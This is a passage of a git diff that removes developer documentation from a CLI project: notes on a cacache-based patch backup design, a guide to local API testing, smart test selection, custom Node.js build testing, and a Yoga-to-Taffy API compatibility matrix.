uuid, - backedUpAt: new Date().toISOString() - } - }) - - // Read/update metadata file - const metadataPath = getMetadataPath(uuid) - let metadata: any - try { - const data = await fs.readFile(metadataPath, 'utf-8') - metadata = JSON.parse(data) - } catch { - metadata = { - uuid, - patchedAt: new Date().toISOString(), - backups: {} - } - } - - metadata.backups[filePath] = { - hash, - size: content.length, - backedUpAt: new Date().toISOString(), - originalPath: filePath - } - - await fs.mkdir(join(metadataPath, '..'), { recursive: true }) - await fs.writeFile(metadataPath, JSON.stringify(metadata, null, 2)) - - return { hash, size: content.length } -} - -// Restore backup -async function restoreBackup( - uuid: string, - filePath: string -): Promise { - // Read metadata to get hash - const metadataPath = getMetadataPath(uuid) - const data = await fs.readFile(metadataPath, 'utf-8') - const metadata = JSON.parse(data) - - const backup = metadata.backups[filePath] - if (!backup) { - return false - } - - // Retrieve from cacache with integrity check - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - const entry = await get(key, { - integrity: backup.hash // Verify integrity on retrieval - }) - - // Write back to original location - await fs.writeFile(filePath, entry.data) - - return true -} - -// Cleanup backups when removing patch -async function cleanupBackups(uuid: string): Promise { - // Read metadata to get all backup keys - const metadataPath = getMetadataPath(uuid) - const data = await fs.readFile(metadataPath, 'utf-8') - const metadata = JSON.parse(data) - - // Remove each backup from cacache - for (const filePath of Object.keys(metadata.backups)) { - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - await remove(key) - } - - // Remove metadata file - await fs.unlink(metadataPath) -} -``` - -## Benefits of Using ssri - -1. **Standard Format**: Same format as npm, pnpm, yarn lockfiles -2. **Built-in Validation**: `ssri.checkData()` handles validation -3. **Multiple Algorithms**: Supports sha1, sha256, sha512 -4. **Conversion Utilities**: `fromHex()`, `parse()`, `hexDigest()` -5. **Cacache Integration**: Cacache expects ssri format -6. **Error Handling**: Proper validation and error reporting - -## Integration with Cacache - -Cacache automatically: -- Validates integrity when retrieving with `integrity` option -- Stores content by hash (content-addressable) -- Deduplicates identical content -- Handles concurrent access safely - -## Key Patterns Summary - -| Pattern | Usage | Count per Patch | -|---------|-------|-----------------| -| `socket:patch:backup::` | Original file backups | 1 per file | -| `socket:patch:download:` | Patch tarball cache | 1 per patch | -| `_patches/manifests/.json` | Metadata (filesystem) | 1 per patch | - -**Example Totals**: -- Patch affecting 5 files = 5 backup entries + 1 download entry + 1 metadata file -- 10 patches affecting 3 files each = 30 backup entries + 10 download entries + 10 metadata files diff --git a/docs/testing/local-testing.md b/docs/testing/local-testing.md deleted file mode 100644 index b40d2ae86..000000000 --- a/docs/testing/local-testing.md +++ /dev/null @@ -1,231 +0,0 @@ -# Testing Against Local Depscan API Server - -This guide explains how to test socket-cli against a local depscan API server. - -## Quick Start - -### 1. Start the Depscan API Server - -In one terminal: - -```bash -cd ../depscan/workspaces/api-v0 -pnpm test -``` - -The API server will start on `http://localhost:8866`. - -### 2. Configure Socket CLI - -The `.env.local` file is already configured to use the local API server: - -```bash -# In socket-cli directory -cat .env.local -``` - -Should show: -```bash -SOCKET_CLI_API_BASE_URL=http://localhost:8866 -``` - -### 3. Run Socket CLI Commands - -Use the `pnpm s` script which automatically loads `.env.local`: - -```bash -# Check version -pnpm s --version - -# Test patch discover -pnpm s patch discover - -# Create a scan -pnpm s scan create . -``` - -## Alternative Methods - -### Method 1: Export Environment Variable - -```bash -export SOCKET_CLI_API_BASE_URL=http://localhost:8866 -./bin/cli.js patch discover -``` - -### Method 2: Inline Environment Variable - -```bash -SOCKET_CLI_API_BASE_URL=http://localhost:8866 ./bin/cli.js patch discover -``` - -### Method 3: Use Dev Script - -```bash -./scripts/dev-local.sh patch discover -``` - -## Verify Configuration - -Check that the CLI is using the local server: - -```bash -# Should show http://localhost:8866 -pnpm s patch discover --debug -``` - -## Testing the New Patches API - -### Test Free Tier Organization - -```bash -# Set up test API token for a free-tier org -export SOCKET_CLI_API_TOKEN=sktsec_test_free_xxxxx - -# Run patch discover -pnpm s patch discover -``` - -Expected behavior: -- Shows patches with PURL objects -- Displays free CVE fixes -- Shows "Upgrade tier for X additional vulnerabilities" messaging -- Only shows latest patch per PURL - -### Test Enterprise Tier Organization - -```bash -# Set up test API token for an enterprise org -export SOCKET_CLI_API_TOKEN=sktsec_test_enterprise_xxxxx - -# Run patch discover -pnpm s patch discover -``` - -Expected behavior: -- Shows patches with PURL objects -- Displays all CVE fixes (free + paid) -- Shows total vulnerability count -- Only shows latest patch per PURL - -## Troubleshooting - -### API Server Not Responding - -Check if the server is running: - -```bash -curl http://localhost:8866/health -``` - -Should return a 200 status. - -### Wrong API Server Being Used - -Verify environment variable: - -```bash -echo $SOCKET_CLI_API_BASE_URL -``` - -If not set, make sure `.env.local` is configured correctly and you're using `pnpm s`. - -### Authentication Errors - -Make sure you have a valid API token: - -```bash -# Check if token is set -echo $SOCKET_CLI_API_TOKEN - -# Or use socket login -pnpm s login -``` - -### Port Already in Use - -If port 8866 is already in use: - -1. Stop the existing process on port 8866 -2. Or change the port in depscan configuration -3. Update `SOCKET_CLI_API_BASE_URL` accordingly - -## Development Workflow - -### Typical Development Flow - -```bash -# Terminal 1: Start depscan API server -cd ../depscan/workspaces/api-v0 -pnpm test - -# Terminal 2: Build and run socket-cli -cd $(pwd) -pnpm run build -pnpm s patch discover - -# After making changes to depscan -# Restart depscan server, no need to rebuild socket-cli - -# After making changes to socket-cli -pnpm run build -pnpm s patch discover -``` - -### Watch Mode for Socket CLI - -Keep socket-cli auto-rebuilding as you make changes: - -```bash -# Terminal 1: Depscan server -cd ../depscan/workspaces/api-v0 -pnpm test - -# Terminal 2: Socket CLI watch mode -cd $(pwd) -pnpm run dev # Alias for build:watch - -# Terminal 3: Test commands -pnpm s patch discover -``` - -## Integration Tests - -Run integration tests against local server: - -```bash -# Start depscan server first (terminal 1) -cd ../depscan/workspaces/api-v0 -pnpm test - -# Run integration tests (terminal 2) -cd $(pwd) -pnpm test:unit test/integration/patches-api.test.mts -``` - -Tests will auto-detect the local server and run, or skip if not available. - -## Environment Variables Reference - -| Variable | Description | Example | -|----------|-------------|---------| -| `SOCKET_CLI_API_BASE_URL` | API server URL | `http://localhost:8866` | -| `SOCKET_CLI_API_TOKEN` | API authentication token | `sktsec_test_xxxxx` | -| `SOCKET_CLI_API_PROXY` | HTTP proxy URL | `http://proxy:8080` | -| `SOCKET_CLI_API_TIMEOUT` | Request timeout in ms | `30000` | - -## Tips - -1. **Always start depscan server first** before running socket-cli commands -2. **Use `pnpm s`** for commands to auto-load `.env.local` -3. **Check server logs** in depscan terminal if API calls fail -4. **Use `--debug` flag** for verbose output when troubleshooting -5. **Keep both projects at same level** for easier path references - -## Need Help? - -- Check depscan server logs in terminal 1 -- Verify API endpoint in browser: `http://localhost:8866/health` -- Test API directly with curl before testing CLI -- Check `.env.local` is configured correctly -- Ensure both projects are on compatible versions diff --git a/docs/testing/smart-test-selection.md b/docs/testing/smart-test-selection.md deleted file mode 100644 index 924722184..000000000 --- a/docs/testing/smart-test-selection.md +++ /dev/null @@ -1,339 +0,0 @@ -# Smart Test Selection - -## Overview - -Smart test selection automatically determines which tests to run based on file changes, dramatically improving development iteration speed. - -**Performance impact**: 40-60% faster test runs by executing only affected tests instead of the entire suite. - -**When full suite runs**: -- CI environment (`CI=true`) -- Explicit `--all` or `--force` flag -- Config file changes (`vitest.config`, `tsconfig`) -- Core utility file changes -- First-time build or no changes detected - -## How It Works - -### Git Integration - -The test mapper uses git utilities from `@socketsecurity/lib/git` to detect changes: - -```typescript -import { getChangedFilesSync, getStagedFilesSync } from '@socketsecurity/lib/git' - -// Detects files with uncommitted changes -const changed = getChangedFilesSync() - -// Detects files staged for commit -const staged = getStagedFilesSync() -``` - -### File Mapping Rules - -Source files map to test files using pattern matching: - -**Direct mapping** (basename match): -``` -src/commands.mts → test/commands.test.mts -src/flags.mts → test/flags.test.mts -``` - -**Test files run themselves**: -``` -test/utils.mts → test/utils.mts -``` - -**Special mappings** (multi-test impact): -``` -src/package-url.ts → test/package-url.test.mts - → test/integration.test.mts - -src/package-url-builder.ts → test/package-url-builder.test.mts - → test/integration.test.mts -``` - -**Data changes** (integration tests): -``` -data/*.json → test/integration.test.mts - → test/purl-types.test.mts -``` - -### Core Files Detection - -Core utilities trigger full suite execution (affect all code): - -```typescript -const CORE_FILES = [ - 'src/helpers.ts', - 'src/strings.ts', - 'src/constants.ts', - 'src/lang.ts', - 'src/error.ts', - 'src/validate.ts', - 'src/normalize.ts', - 'src/encode.ts', - 'src/decode.ts', - 'src/objects.ts', -] -``` - -**Why**: These files provide foundational utilities used throughout the codebase. Changes here require comprehensive validation. - -### Fallback Behavior - -**No test mapping found**: Runs all tests (safer default) -**No changes detected**: Skips tests entirely -**Deleted test files**: Automatically excluded from execution - -## Usage - -### Basic Commands - -```bash -# Run only affected tests (default behavior) -pnpm test - -# Run tests for staged changes only -pnpm test --staged - -# Force full suite execution -pnpm test --all - -# Skip checks for faster iteration -pnpm test --fast - -# Combine flags for staged + fast mode -pnpm test --staged --fast -``` - -### Advanced Usage - -```bash -# Run with coverage for changed tests -pnpm test --coverage - -# Update snapshots for affected tests -pnpm test --update - -# Pass additional vitest arguments -pnpm test -- --reporter=dot - -# Fast mode with coverage -pnpm test --fast --coverage -``` - -### Environment Variables - -```bash -# Force all tests to run -FORCE_TEST=1 pnpm test - -# Simulates CI behavior (always runs full suite) -CI=true pnpm test -``` - -### Example Workflows - -**Feature development**: -```bash -# Edit source file -vi packages/cli/src/commands.mts - -# Run affected tests only -pnpm test --fast - -# Runs: test/commands.test.mts -``` - -**Core utility changes**: -```bash -# Edit core utility -vi packages/cli/src/helpers.ts - -# Automatically runs full suite -pnpm test --fast - -# Reason: Core file changes -``` - -**Testing staged commits**: -```bash -# Stage changes -git add packages/cli/src/flags.mts - -# Test only staged changes -pnpm test --staged --fast - -# Runs: test/flags.test.mts -``` - -## Mapping Rules Reference - -### Source to Test Patterns - -| Source Pattern | Test Pattern | Behavior | -|---------------|--------------|----------| -| `src/*.mts` | `test/*.test.mts` | Direct basename match | -| `src/commands/*.mts` | `test/commands/*.test.mts` | Subdirectory preserved | -| `src/helpers.ts` | All tests | Core file triggers full suite | -| `test/*.test.mts` | Self | Test files run themselves | -| `data/*.json` | `test/integration.test.mts` | Data changes run integration | -| `*.config.*` | All tests | Config changes run full suite | - -### File Type Filtering - -Smart selection only processes code files: - -```typescript -const codeExtensions = ['.js', '.mjs', '.cjs', '.ts', '.cts', '.mts', '.json'] -``` - -**Ignored files**: `.md`, `.txt`, `.log`, images, etc. - -## Customization - -### Adding New Mappings - -Edit `/packages/cli/scripts/utils/changed-test-mapper.mjs`: - -```typescript -function mapSourceToTests(filepath) { - // Add custom mapping - if (normalized.includes('src/custom-feature.ts')) { - return ['test/custom-feature.test.mts', 'test/integration.test.mts'] - } - - // Existing mappings... -} -``` - -### Defining Core Files - -Update the `CORE_FILES` array: - -```typescript -const CORE_FILES = [ - 'src/helpers.ts', - 'src/strings.ts', - // Add new core file - 'src/new-core-utility.ts', -] -``` - -### Debugging Mappings - -Add logging to see which tests are selected: - -```typescript -export function getTestsToRun(options = {}) { - const testInfo = /* ... */ - - // Debug output - console.log('Mode:', testInfo.mode) - console.log('Reason:', testInfo.reason) - console.log('Tests:', testInfo.tests) - - return testInfo -} -``` - -Or use verbose vitest output: - -```bash -pnpm test -- --reporter=verbose -``` - -## Architecture - -### Implementation Files - -**Test runner** (`packages/cli/scripts/test.mjs`): -- Orchestrates check → build → test workflow -- Parses command-line flags -- Invokes test mapper - -**Test mapper** (`packages/cli/scripts/utils/changed-test-mapper.mjs`): -- Detects changed/staged files via git -- Maps source files to test files -- Determines full vs. selective execution - -**Interactive runner** (`packages/cli/scripts/utils/interactive-runner.mjs`): -- Provides TTY-aware test execution -- Handles Ctrl+O for options menu - -### Data Flow - -``` -User runs: pnpm test --staged - ↓ -scripts/test.mjs parses flags - ↓ -getTestsToRun({ staged: true }) - ↓ -getStagedFilesSync() via git - ↓ -mapSourceToTests() for each file - ↓ -Returns: { tests: ['test/flags.test.mts'], mode: 'staged' } - ↓ -vitest runs: test/flags.test.mts -``` - -### Exit Codes - -- `0` - All tests passed -- `1` - Tests failed or error occurred -- `128+` - Signal termination (SIGINT, SIGTERM) - -## Best Practices - -**During development**: -```bash -# Quick iteration loop -pnpm test --fast # Run checks + affected tests -git add . # Stage changes -pnpm test --staged --fast # Verify staged changes -git commit # Commit with confidence -``` - -**Before push**: -```bash -# Full validation -pnpm test --all # Run entire suite -``` - -**In CI**: -```bash -# Automatic full suite execution (CI=true) -pnpm test -``` - -**Debugging test selection**: -```bash -# See which tests would run without executing -git status # Check changed files -git diff --name-only # List changed file names -``` - -## Troubleshooting - -**Tests not running when expected**: -- Check if file has corresponding test file -- Verify file extension matches code extensions -- Ensure test file exists and isn't deleted - -**Too many tests running**: -- Check if you modified a core file -- Verify config files aren't changed -- Use `--staged` to test only staged changes - -**No tests running**: -- Verify you have uncommitted changes -- Check git status shows modified files -- Use `--all` to force full suite execution - -**Test mapper issues**: -- Review `/packages/cli/scripts/utils/changed-test-mapper.mjs` -- Add console.log statements for debugging -- Check git utilities are working correctly diff --git a/docs/testing/testing-custom-node.md b/docs/testing/testing-custom-node.md deleted file mode 100644 index cba8bdd7b..000000000 --- a/docs/testing/testing-custom-node.md +++ /dev/null @@ -1,158 +0,0 @@ -# Testing Custom Node.js Build - -## ⚠️ Important Understanding - -The custom Node.js binary built with yao-pkg patches is **NOT meant to be run standalone**. It is specifically designed to be used as a base by `@yao-pkg/pkg` when creating executable bundles. - -### Why Can't We Run It Standalone? - -1. **Always-on SEA mode**: Our Socket modification makes `isSea()` always return `true` -2. **pkg bootstrap**: The binary includes pkg bootstrap code that expects to be wrapped -3. **Intended use**: pkg embeds assets into the binary and sets up the proper environment - -### The Correct Testing Approach - -Test the **complete workflow**: Build → pkg → Test executable - -``` -Custom Node Binary → pkg wraps it → Socket CLI executable → Test that! -``` - -## 🧪 Testing Workflows - -### Option 1: Full Workflow Test (Recommended) - -Test the complete pkg workflow from building Socket CLI to testing the executable: - -```bash -# Build Socket CLI + create pkg executable + test -node scripts/test-pkg-workflow.mjs - -# Skip steps if already done: -node scripts/test-pkg-workflow.mjs --skip-build # Skip pnpm build -node scripts/test-pkg-workflow.mjs --skip-pkg # Skip pkg creation -``` - -**What it tests**: -- Custom Node binary exists in pkg cache -- Socket CLI builds successfully with `pnpm build` -- pkg creates executable using custom Node -- Executable runs and responds to commands - -### Option 2: Manual Testing - -If you prefer to test manually: - -```bash -# 1. Verify custom Node is in cache -ls -lh ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64-signed - -# 2. Build Socket CLI -pnpm run build - -# 3. Create pkg executable -pnpm exec pkg . - -# 4. Test the executable -./pkg-binaries/socket-macos-arm64 --version -./pkg-binaries/socket-macos-arm64 --help -./pkg-binaries/socket-macos-arm64 scan --help -``` - -### Option 3: Integration Test - -Run the existing integration test that tests the full pkg workflow: - -```bash -node scripts/test-yao-pkg-integration.mjs -``` - -## ❌ What NOT To Do - -**DO NOT try to run the custom Node binary directly**: - -```bash -# ❌ This will FAIL: -~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64-signed --version - -# ❌ This will also FAIL: -PKG_EXECPATH='' ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64-signed --version -``` - -**Why?** The binary has been modified to always run in SEA mode for pkg compatibility. It's not a general-purpose Node.js binary. - -## 🔍 Verification Steps - -After building the custom Node binary: - -### Step 1: Verify Build -```bash -node scripts/verify-node-build.mjs -``` - -**Note**: This verification has limitations. It tests the source modifications but cannot fully test the binary's standalone functionality (which is expected). - -### Step 2: Test pkg Workflow -```bash -node scripts/test-pkg-workflow.mjs -``` - -This is the **definitive test** that validates the custom Node works correctly with pkg. - -## 📊 What Each Test Validates - -| Test | What It Checks | Pass Criteria | -|------|---------------|---------------| -| `verify-node-build.mjs` | Source modifications, file integrity | ⚠️ Partial (binary tests will fail) | -| `test-pkg-workflow.mjs` | Complete pkg workflow | ✅ Full validation | -| `test-yao-pkg-integration.mjs` | Integration with pkg | ✅ Full validation | - -## 🎯 Success Criteria - -The custom Node.js build is successful when: - -1. ✅ Build completes without errors -2. ✅ Binary is installed to pkg cache (~54MB) -3. ✅ pkg can create executables using it -4. ✅ Socket CLI executable runs correctly -5. ✅ Executable responds to commands (`--version`, `--help`, etc.) - -## 🐛 Troubleshooting - -### "Cannot find module" Errors - -If you see errors like: -``` -Error: Cannot find module '--version' -``` - -This means you're trying to run the custom Node binary standalone, which won't work. Use the pkg workflow test instead. - -### pkg Fails to Find Binary - -If pkg can't find the custom Node: - -```bash -# Check if binary exists in cache -ls -lh ~/.pkg-cache/v3.5/ - -# Rebuild if needed -node scripts/build-yao-pkg-node.mjs --clean -``` - -### Executable Crashes or Doesn't Work - -1. Verify the build completed successfully -2. Run verification: `node scripts/verify-node-build.mjs` -3. Check Socket CLI built correctly: `pnpm run build` -4. Try rebuilding everything: `node scripts/build-yao-pkg-node.mjs --clean` - -## 📚 Related Documentation - -- [Build System Overview](./BUILD-SYSTEM-SUMMARY.md) -- [Quick Reference](./node-build-quick-reference.md) -- [Build Improvements](./technical/build-improvements-2025-10-15.md) - ---- - -**Key Takeaway**: The custom Node binary is a **build artifact** for pkg, not a standalone Node.js replacement. Always test via the pkg workflow! diff --git a/docs/yoga-layout/research/api-compatibility.md b/docs/yoga-layout/research/api-compatibility.md deleted file mode 100644 index 7f82e1e80..000000000 --- a/docs/yoga-layout/research/api-compatibility.md +++ /dev/null @@ -1,370 +0,0 @@ -# API Compatibility Matrix - -This document provides a detailed compatibility matrix between Yoga Layout's official API and this Taffy-based implementation. - -## Status Legend - -- ✅ **Fully Supported**: Works exactly as Yoga, tested and verified -- ⚠️ **Partial Support**: Implemented but with known limitations or differences -- 🚧 **Planned**: Not yet implemented but technically feasible -- ❌ **Not Supported**: Fundamental limitation, cannot be supported with current Taffy version - -## Node API - -### Tree Management - -| Method | Status | Notes | -|--------|--------|-------| -| `Node.create(config?)` | ✅ | Factory method works, config optional | -| `insertChild(child, index)` | ⚠️ | Taffy appends children; index tracked but may not affect layout order ([src/lib.rs:36-40](src/lib.rs#L36-L40)) | -| `removeChild(child)` | ✅ | Fully supported | -| `getChild(index)` | ✅ | Returns child at index from adapter layer | -| `getChildCount()` | ✅ | Returns correct count | -| `getParent()` | ✅ | Tracked in adapter layer | - -**Reference**: [Yoga Node API](https://yogalayout.dev/docs/api/node) - -### Lifecycle - -| Method | Status | Notes | -|--------|--------|-------| -| `free()` | ✅ | No-op (WASM GC handles memory) ([src/lib.rs:406-409](src/lib.rs#L406-L409)) | -| `freeRecursive()` | ✅ | No-op (WASM GC handles memory) ([src/lib.rs:411-415](src/lib.rs#L411-L415)) | -| `reset()` | ✅ | Resets to default style ([src/lib.rs:417-421](src/lib.rs#L417-L421)) | -| `copyStyle(node)` | ⚠️ | Stub implementation, marks dirty but doesn't copy styles | - -### Layout Calculation - -| Method | Status | Notes | -|--------|--------|-------| -| `calculateLayout(width, height, direction)` | ✅ | Fully supported, undefined becomes MaxContent | -| `markDirty()` | ✅ | Tracked in adapter layer | -| `isDirty()` | ✅ | Tracked in adapter layer | -| `hasNewLayout()` | ✅ | Tracked in adapter layer | -| `markLayoutSeen()` | ✅ | Clears hasNewLayout flag | - -### Layout Getters - -| Method | Status | Notes | -|--------|--------|-------| -| `getComputedLeft()` | ✅ | Maps to Taffy layout.location.x ([src/lib.rs:336-342](src/lib.rs#L336-L342)) | -| `getComputedTop()` | ✅ | Maps to Taffy layout.location.y ([src/lib.rs:344-350](src/lib.rs#L344-L350)) | -| `getComputedWidth()` | ✅ | Maps to Taffy layout.size.width ([src/lib.rs:353-360](src/lib.rs#L353-L360)) | -| `getComputedHeight()` | ✅ | Maps to Taffy layout.size.height ([src/lib.rs:362-369](src/lib.rs#L362-L369)) | -| `getComputedRight()` | ✅ | Calculated as left + width ([src/lib.rs:371-378](src/lib.rs#L371-L378)) | -| `getComputedBottom()` | ✅ | Calculated as top + height ([src/lib.rs:380-387](src/lib.rs#L380-L387)) | -| `getComputedLayout()` | ✅ | Returns all computed values as object | -| `getComputedMargin(edge)` | 🚧 | Not yet implemented | -| `getComputedPadding(edge)` | 🚧 | Not yet implemented | -| `getComputedBorder(edge)` | ❌ | Taffy v0.6 doesn't include border in layout | - -### Flexbox Properties - -| Method | Status | Notes | -|--------|--------|-------| -| `setFlexDirection(direction)` | ✅ | Enum mapping: Column=0, ColumnReverse=1, Row=2, RowReverse=3 ([src/lib.rs:107-119](src/lib.rs#L107-L119)) | -| `setJustifyContent(justify)` | ✅ | Maps to Taffy JustifyContent ([src/lib.rs:121-136](src/lib.rs#L121-L136)) | -| `setAlignItems(align)` | ✅ | Maps to Taffy AlignItems, SpaceBetween/SpaceAround fallback to Start ([src/lib.rs:138-155](src/lib.rs#L138-L155)) | -| `setAlignContent(align)` | ✅ | Maps to Taffy AlignContent, Baseline fallback to Start ([src/lib.rs:157-174](src/lib.rs#L157-L174)) | -| `setAlignSelf(align)` | ✅ | Maps to Taffy AlignSelf ([src/lib.rs:176-193](src/lib.rs#L176-L193)) | -| `setFlexWrap(wrap)` | ✅ | Maps to Taffy FlexWrap: NoWrap=0, Wrap=1, WrapReverse=2 ([src/lib.rs:195-207](src/lib.rs#L195-L207)) | -| `setFlex(flex)` | ✅ | Sets flexGrow=flex, flexShrink=1, flexBasis=0 ([src/lib.rs:209-217](src/lib.rs#L209-L217)) | -| `setFlexGrow(flexGrow)` | ✅ | Direct mapping to Taffy ([src/lib.rs:219-225](src/lib.rs#L219-L225)) | -| `setFlexShrink(flexShrink)` | ✅ | Direct mapping to Taffy ([src/lib.rs:227-233](src/lib.rs#L227-L233)) | -| `setFlexBasis(flexBasis)` | ✅ | Converts to Dimension::Length ([src/lib.rs:235-241](src/lib.rs#L235-L241)) | - -**Reference**: [CSS Flexbox Spec](https://www.w3.org/TR/css-flexbox-1/) - -### Sizing Properties - -| Method | Status | Notes | -|--------|--------|-------| -| `setWidth(width)` | ✅ | Converts to Dimension::Length ([src/lib.rs:58-64](src/lib.rs#L58-L64)) | -| `setHeight(height)` | ✅ | Converts to Dimension::Length ([src/lib.rs:66-72](src/lib.rs#L66-L72)) | -| `setMinWidth(minWidth)` | ✅ | Converts to Dimension::Length ([src/lib.rs:74-80](src/lib.rs#L74-L80)) | -| `setMinHeight(minHeight)` | ✅ | Converts to Dimension::Length ([src/lib.rs:82-88](src/lib.rs#L82-L88)) | -| `setMaxWidth(maxWidth)` | ✅ | Converts to Dimension::Length ([src/lib.rs:90-96](src/lib.rs#L90-L96)) | -| `setMaxHeight(maxHeight)` | ✅ | Converts to Dimension::Length ([src/lib.rs:98-104](src/lib.rs#L98-L104)) | -| `setWidthPercent(width)` | 🚧 | Not yet implemented | -| `setHeightPercent(height)` | 🚧 | Not yet implemented | -| `setWidthAuto()` | 🚧 | Not yet implemented | -| `setHeightAuto()` | 🚧 | Not yet implemented | - -### Spacing Properties - -| Method | Status | Notes | -|--------|--------|-------| -| `setPadding(edge, padding)` | ✅ | Uses LengthPercentage, supports all edges including Horizontal/Vertical/All shortcuts ([src/lib.rs:243-278](src/lib.rs#L243-L278)) | -| `setPaddingPercent(edge, padding)` | 🚧 | Not yet implemented | -| `setMargin(edge, margin)` | ✅ | Uses LengthPercentageAuto, supports all edges including Horizontal/Vertical/All shortcuts ([src/lib.rs:280-315](src/lib.rs#L280-L315)) | -| `setMarginPercent(edge, margin)` | 🚧 | Not yet implemented | -| `setMarginAuto(edge)` | 🚧 | Not yet implemented | -| `setBorder(edge, border)` | ❌ | Taffy v0.6 doesn't support border in layout calculations | - -**Edge Enum Mapping** ([src/enums.mjs:38-48](src/enums.mjs#L38-L48)): -- Left = 0 -- Top = 1 -- Right = 2 -- Bottom = 3 -- Start = 4 (mapped to Left) -- End = 5 (mapped to Right) -- Horizontal = 6 (sets Left + Right) -- Vertical = 7 (sets Top + Bottom) -- All = 8 (sets all four edges) - -### Other Properties - -| Method | Status | Notes | -|--------|--------|-------| -| `setDisplay(display)` | 🚧 | Not yet implemented (Flex=0, None=1) | -| `setPosition(position)` | ❌ | Absolute positioning not supported in Taffy | -| `setPositionType(positionType)` | ❌ | Absolute positioning not supported | -| `setAspectRatio(aspectRatio)` | 🚧 | Not yet implemented | -| `setOverflow(overflow)` | 🚧 | Not yet implemented | -| `setDirection(direction)` | 🚧 | Not yet implemented | -| `setGap(gutter, gap)` | 🚧 | Not yet implemented | - -### Measure Function - -| Method | Status | Notes | -|--------|--------|-------| -| `setMeasureFunc(measureFunc)` | ⚠️ | Stored but not integrated with layout calculations (Taffy limitation) | -| `unsetMeasureFunc()` | ⚠️ | Clears stored function | -| `setDirtiedFunc(dirtiedFunc)` | ✅ | Called when node is marked dirty | - -**Limitation**: Yoga allows custom measure functions for leaf nodes (e.g., measuring text). Taffy doesn't provide this extension point. Measure functions are stored for API compatibility but don't affect layout calculations. - -**Workaround**: Pre-calculate sizes and set them explicitly using `setWidth()`/`setHeight()`. - -**Reference**: [Yoga Measure Function](https://yogalayout.dev/docs/api/node#measure-function) - -## Config API - -### Configuration Options - -| Method | Status | Notes | -|--------|--------|-------| -| `Config.create()` | ✅ | Factory method works | -| `free()` | ✅ | No-op (WASM GC) | -| `setUseWebDefaults(enabled)` | ⚠️ | Stored but doesn't affect Taffy | -| `useWebDefaults()` | ⚠️ | Returns stored value | -| `setPointScaleFactor(factor)` | ⚠️ | Stored but doesn't affect Taffy | -| `setExperimentalFeatureEnabled(feature, enabled)` | ⚠️ | No-op (Taffy has no experimental features) | -| `isExperimentalFeatureEnabled(feature)` | ⚠️ | Always returns false | -| `setErrata(errata)` | ⚠️ | No-op (Taffy has no errata flags) | -| `getErrata()` | ⚠️ | Always returns 0 | - -**Limitation**: Taffy doesn't have equivalent configuration options. These are provided for API compatibility but don't affect layout calculations. - -**Reference**: [Yoga Config API](https://yogalayout.dev/docs/api/config) - -## Enum Values - -All enum values match Yoga's numeric values for API compatibility. - -### Align - -```javascript -Align.Auto = 0 -Align.FlexStart = 1 -Align.Center = 2 -Align.FlexEnd = 3 -Align.Stretch = 4 -Align.Baseline = 5 -Align.SpaceBetween = 6 // ⚠️ Falls back to Start in alignItems/alignSelf -Align.SpaceAround = 7 // ⚠️ Falls back to Start in alignItems/alignSelf -Align.SpaceEvenly = 8 -``` - -**Reference**: [src/enums.mjs:10-20](src/enums.mjs#L10-L20) - -### FlexDirection - -```javascript -FlexDirection.Column = 0 -FlexDirection.ColumnReverse = 1 -FlexDirection.Row = 2 -FlexDirection.RowReverse = 3 -``` - -**Reference**: [src/enums.mjs:50-56](src/enums.mjs#L50-L56) - -### Justify - -```javascript -Justify.FlexStart = 0 -Justify.Center = 1 -Justify.FlexEnd = 2 -Justify.SpaceBetween = 3 -Justify.SpaceAround = 4 -Justify.SpaceEvenly = 5 -``` - -**Reference**: [src/enums.mjs:58-66](src/enums.mjs#L58-L66) - -### Wrap - -```javascript -Wrap.NoWrap = 0 -Wrap.Wrap = 1 -Wrap.WrapReverse = 2 -``` - -**Reference**: [src/enums.mjs:68-73](src/enums.mjs#L68-L73) - -## Known Differences from Yoga - -### 1. insertChild Index Behavior - -**Yoga**: Children can be inserted at specific indices, affecting layout order. - -**This Implementation**: Taffy's `add_child()` appends children to the end. The index parameter is tracked in the JavaScript adapter layer ([src/index.mjs:190-200](src/index.mjs#L190-L200)), but the underlying Taffy layout may not respect insertion order in all cases. - -**Impact**: Mostly cosmetic. Most applications insert children sequentially (0, 1, 2...) where this works correctly. - -**Workaround**: Remove and re-add children if order needs to change. - -### 2. Measure Functions - -**Yoga**: Supports custom measure functions for leaf nodes (used for text measurement, images, etc.). - -**This Implementation**: Measure functions are stored but not called during layout ([src/index.mjs:349-361](src/index.mjs#L349-L361)). - -**Impact**: Applications using measure functions (like Ink for text measurement) must pre-calculate sizes. - -**Workaround**: Calculate dimensions externally and set them with `setWidth()`/`setHeight()`. - -**Potential Solution**: Would require forking Taffy to add measure function support, or implementing a pre-layout measurement pass. - -### 3. Config Options - -**Yoga**: Config options affect layout calculations (web defaults, point scaling, errata). - -**This Implementation**: Config options are stored for API compatibility but don't affect Taffy's calculations. - -**Impact**: Minimal. Most applications don't use these options. Web defaults differences are subtle. - -### 4. Border Layout - -**Yoga**: Border is included in layout calculations. - -**This Implementation**: Taffy v0.6 doesn't include border in the layout model. - -**Impact**: Applications using border for spacing must use padding instead. - -**Workaround**: Convert border to padding: `setPadding(edge, borderWidth + paddingWidth)`. - -### 5. Absolute Positioning - -**Yoga**: Supports absolute positioning with `setPosition()` and `setPositionType(PositionType.Absolute)`. - -**This Implementation**: Absolute positioning not implemented. - -**Impact**: Applications using absolute positioning will not work correctly. - -**Status**: Could be implemented by mapping to Taffy's position support (future work). - -## Testing Against Yoga Suite - -We test compatibility using Yoga's official test suite as a submodule (v3.1.0): - -``` -.yoga-tests/javascript/tests/ -├── generated/ # ~900 generated tests -│ ├── YGFlexTest.test.ts -│ ├── YGPaddingTest.test.ts -│ ├── YGMarginTest.test.ts -│ └── ... -└── YG*.test.ts # ~50 manual tests -``` - -**Test Approach**: Tests are adapted to use our implementation's API. Tests that rely on unsupported features (border, absolute positioning, measure functions) are marked as expected failures. - -**Reference**: [TESTING.md](./TESTING.md) - -## Migration Guide - -### From Yoga C++ to This Implementation - -Most applications should work with minimal changes: - -#### 1. Import Change - -```javascript -// Before (Yoga C++) -import Yoga from 'yoga-layout' - -// After (Taffy-based) -import Yoga from '@socketsecurity/yoga-layout' -await Yoga.init() // Initialize WASM -``` - -#### 2. Measure Functions - -If your application uses measure functions: - -```javascript -// Before (Yoga C++) 